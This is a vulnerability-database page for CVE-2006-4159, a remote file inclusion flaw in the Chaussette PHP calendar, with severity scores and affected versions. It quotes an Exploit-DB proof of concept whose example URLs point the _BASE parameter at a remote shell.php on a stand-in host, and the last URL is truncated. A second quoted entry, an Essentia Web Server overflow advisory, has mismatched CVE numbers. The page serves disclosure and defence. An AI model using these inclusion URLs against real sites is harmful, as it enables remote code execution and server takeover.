CVE-2006-4159
published 2006-08-16CVE-2006-4159: Multiple PHP remote file inclusion vulnerabilities in Chaussette 080706 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _BASE…
PriorityP348high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
9.08%
94.7th percentile
Multiple PHP remote file inclusion vulnerabilities in Chaussette 080706 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the _BASE parameter to scripts in Classes/ including (1) Evenement.php, (2) Event.php, (3) Event_for_month.php, (4) Event_for_week.php, (5) My_Log.php, (6) My_Smarty.php, and possibly (7) Event_for_month_per_day.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chaussette | chaussette | <= 080706 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Chaussette 080706 - '_BASE' Remote File Inclusion
exploitdb·2006-08-10
CVE-2006-4216 Chaussette 080706 - '_BASE' Remote File Inclusion
Chaussette 080706 - '_BASE' Remote File Inclusion
---
Chaussette Remote File Inclusion
CreW: ToXiC
Bug Found By Drago84
Source Code:
http://freshmeat.net/redir/chaussette/64502/url_zip/chaussette.zip
Page Affect
/Classes/Evenement.php
/Classes/Event.php
/Classes/Event_for_month.php
/Classes/Event_for_month_per_day.php
/Classes/Event_for_week.php
/Classes/My_Log.php
/Classes/My_Smarty.php
Problem Is :
$_BASE Not Declare;
ExP:
http://www.site.com/dir_Chaussette/Classes/Evenement.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_month.php?_BASE=http://www.evalsite.com/shell.php
http://www.site.com/dir_Chaussette/Classes/Event_for_week.php?_BASE=ht
Exploit-DB
Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
exploitdb·2003-07-04
CVE-2006-5850 Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
Essentia Web Server 2.1 - 'URL' Remote Buffer Overflow
---
// source: https://www.securityfocus.com/bid/4159/info
Essentia Web Server is a multi-threaded HTTP server designed for Microsoft Windows and Linux environments. Essentia is maintained by Essen.
Essentia is prone to a remote denial of service. This condition may be triggered by submitting an excessively long URL (2000+ bytes). Successful exploitation will deny service to legitimate users and will require that the webserver be restarted to regain normal functionality.
This problem is due to a lack of bounds-checking on the length of URLs. Because of this, an attacker may also be able to exploit this condition to execute arbitrary code.
This issue was reported for Essentia Web Sever v2.1; earlier versions may also be affected.
No writeups or analysis indexed.
http://secunia.com/advisories/21489http://www.osvdb.org/27897http://www.osvdb.org/27898http://www.osvdb.org/27899http://www.osvdb.org/27900http://www.osvdb.org/27901http://www.osvdb.org/27902http://www.securityfocus.com/bid/19480http://www.vupen.com/english/advisories/2006/3269https://exchange.xforce.ibmcloud.com/vulnerabilities/28327https://www.exploit-db.com/exploits/2169http://secunia.com/advisories/21489http://www.osvdb.org/27897http://www.osvdb.org/27898http://www.osvdb.org/27899http://www.osvdb.org/27900http://www.osvdb.org/27901http://www.osvdb.org/27902http://www.securityfocus.com/bid/19480http://www.vupen.com/english/advisories/2006/3269https://exchange.xforce.ibmcloud.com/vulnerabilities/28327https://www.exploit-db.com/exploits/2169
2006-08-16
Published